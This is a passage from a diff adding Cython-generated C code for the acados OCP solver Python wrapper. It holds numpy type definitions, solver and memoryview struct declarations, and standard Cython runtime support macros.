"../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":755 + * # The int types are mapped a bit surprising -- + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t + */ +typedef npy_long __pyx_t_5numpy_int_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":756 + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong longlong_t + * + */ +typedef npy_longlong __pyx_t_5numpy_long_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":757 + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_ulong uint_t + */ +typedef npy_longlong __pyx_t_5numpy_longlong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":759 + * ctypedef npy_longlong longlong_t + * + * ctypedef npy_ulong uint_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t + */ +typedef npy_ulong __pyx_t_5numpy_uint_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":760 + * + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulonglong_t + * + */ +typedef npy_ulonglong __pyx_t_5numpy_ulong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":761 + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_intp intp_t + */ +typedef npy_ulonglong __pyx_t_5numpy_ulonglong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":763 + * ctypedef npy_ulonglong ulonglong_t + * + * ctypedef npy_intp intp_t # <<<<<<<<<<<<<< + * ctypedef npy_uintp uintp_t + * + */ +typedef npy_intp __pyx_t_5numpy_intp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":764 + * + * ctypedef npy_intp intp_t + * ctypedef npy_uintp uintp_t # <<<<<<<<<<<<<< + * + * ctypedef npy_double float_t + */ +typedef npy_uintp __pyx_t_5numpy_uintp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":766 + * ctypedef npy_uintp uintp_t + * + * ctypedef npy_double float_t # <<<<<<<<<<<<<< + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t + */ +typedef npy_double __pyx_t_5numpy_float_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":767 + * + * ctypedef npy_double float_t + * ctypedef npy_double double_t # <<<<<<<<<<<<<< + * ctypedef npy_longdouble longdouble_t + * + */ +typedef npy_double __pyx_t_5numpy_double_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":768 + * ctypedef npy_double float_t + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cfloat cfloat_t + */ +typedef npy_longdouble __pyx_t_5numpy_longdouble_t; +/* #### Code section: complex_type_declarations ### */ +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< float > __pyx_t_float_complex; + #else + typedef float _Complex __pyx_t_float_complex; + #endif +#else + typedef struct { float real, imag; } __pyx_t_float_complex; +#endif +static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float, float); + +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< double > __pyx_t_double_complex; + #else + typedef double _Complex __pyx_t_double_complex; + #endif +#else + typedef struct { double real, imag; } __pyx_t_double_complex; +#endif +static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); + +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; +struct __pyx_array_obj; +struct __pyx_MemviewEnum_obj; +struct __pyx_memoryview_obj; +struct __pyx_memoryviewslice_obj; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":770 + * ctypedef npy_longdouble longdouble_t + * + * ctypedef npy_cfloat cfloat_t # <<<<<<<<<<<<<< + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t + */ +typedef npy_cfloat __pyx_t_5numpy_cfloat_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":771 + * + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t # <<<<<<<<<<<<<< + * ctypedef npy_clongdouble clongdouble_t + * + */ +typedef npy_cdouble __pyx_t_5numpy_cdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":772 + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cdouble complex_t + */ +typedef npy_clongdouble __pyx_t_5numpy_clongdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":774 + * ctypedef npy_clongdouble clongdouble_t + * + * ctypedef npy_cdouble complex_t # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew1(a): + */ +typedef npy_cdouble __pyx_t_5numpy_complex_t; + +/* "acados_template/acados_ocp_solver_pyx.pyx":52 + * + * + * cdef class AcadosOcpSolverCython: # <<<<<<<<<<<<<< + * """ + * Class to interact with the acados ocp solver C object. + */ +struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython { + PyObject_HEAD + long_solver_capsule *capsule; + void *nlp_opts; + ocp_nlp_dims *nlp_dims; + ocp_nlp_config *nlp_config; + ocp_nlp_out *nlp_out; + ocp_nlp_out *sens_out; + ocp_nlp_in *nlp_in; + ocp_nlp_solver *nlp_solver; + int status; + int solver_created; + PyObject *model_name; + int N; + PyObject *nlp_solver_type; +}; + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ +struct __pyx_array_obj { + PyObject_HEAD + struct __pyx_vtabstruct_array *__pyx_vtab; + char *data; + Py_ssize_t len; + char *format; + int ndim; + Py_ssize_t *_shape; + Py_ssize_t *_strides; + Py_ssize_t itemsize; + PyObject *mode; + PyObject *_format; + void (*callback_free_data)(void *); + int free_data; + int dtype_is_object; +}; + + +/* "View.MemoryView":302 + * + * @cname('__pyx_MemviewEnum') + * cdef class Enum(object): # <<<<<<<<<<<<<< + * cdef object name + * def __init__(self, name): + */ +struct __pyx_MemviewEnum_obj { + PyObject_HEAD + PyObject *name; +}; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ +struct __pyx_memoryview_obj { + PyObject_HEAD + struct __pyx_vtabstruct_memoryview *__pyx_vtab; + PyObject *obj; + PyObject *_size; + PyObject *_array_interface; + PyThread_type_lock lock; + __pyx_atomic_int_type acquisition_count; + Py_buffer view; + int flags; + int dtype_is_object; + __Pyx_TypeInfo *typeinfo; +}; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ +struct __pyx_memoryviewslice_obj { + struct __pyx_memoryview_obj __pyx_base; + __Pyx_memviewslice from_slice; + PyObject *from_object; + PyObject *(*to_object_func)(char *); + int (*to_dtype_func)(char *, PyObject *); +}; + + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ + +struct __pyx_vtabstruct_array { + PyObject *(*get_memview)(struct __pyx_array_obj *); +}; +static struct __pyx_vtabstruct_array *__pyx_vtabptr_array; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ + +struct __pyx_vtabstruct_memoryview { + char *(*get_item_pointer)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*is_slice)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_slice_assignment)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*setitem_slice_assign_scalar)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_indexed)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*convert_item_to_object)(struct __pyx_memoryview_obj *, char *); + PyObject *(*assign_item_from_object)(struct __pyx_memoryview_obj *, char *, PyObject *); + PyObject *(*_get_base)(struct __pyx_memoryview_obj *); +}; +static struct __pyx_vtabstruct_memoryview *__pyx_vtabptr_memoryview; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ + +struct __pyx_vtabstruct__memoryviewslice { + struct __pyx_vtabstruct_memoryview __pyx_base; +}; +static struct __pyx_vtabstruct__memoryviewslice *__pyx_vtabptr__memoryviewslice; +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* ArgTypeTest.proto */ +#define __Pyx_ArgTypeTest(obj, type, none_allowed, name, exact)\ + ((likely(__Pyx_IS_TYPE(obj, type) | (none_allowed && (obj == Py_None)))) ? 1 :\ + __Pyx__ArgTypeTest(obj, type, name, exact)) +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* BuildPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char); + +/* JoinPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char); + +/* StrEquals.proto */ +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyString_Equals __Pyx_PyUnicode_Equals +#else +#define __Pyx_PyString_Equals __Pyx_PyBytes_Equals +#endif + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *); /*proto*/ +/* GetAttr.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *, PyObject *); + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* ObjectGetItem.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); +#else +#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* DivInt[Py_ssize_t].proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t, Py_ssize_t); + +/* UnaryNegOverflows.proto */ +#define __Pyx_UNARY_NEG_WOULD_OVERFLOW(x)\ + (((x) < 0) & ((unsigned long)(x) == 0-(unsigned long)(x))) + +/* GetAttr3.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *, PyObject *, PyObject *); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, 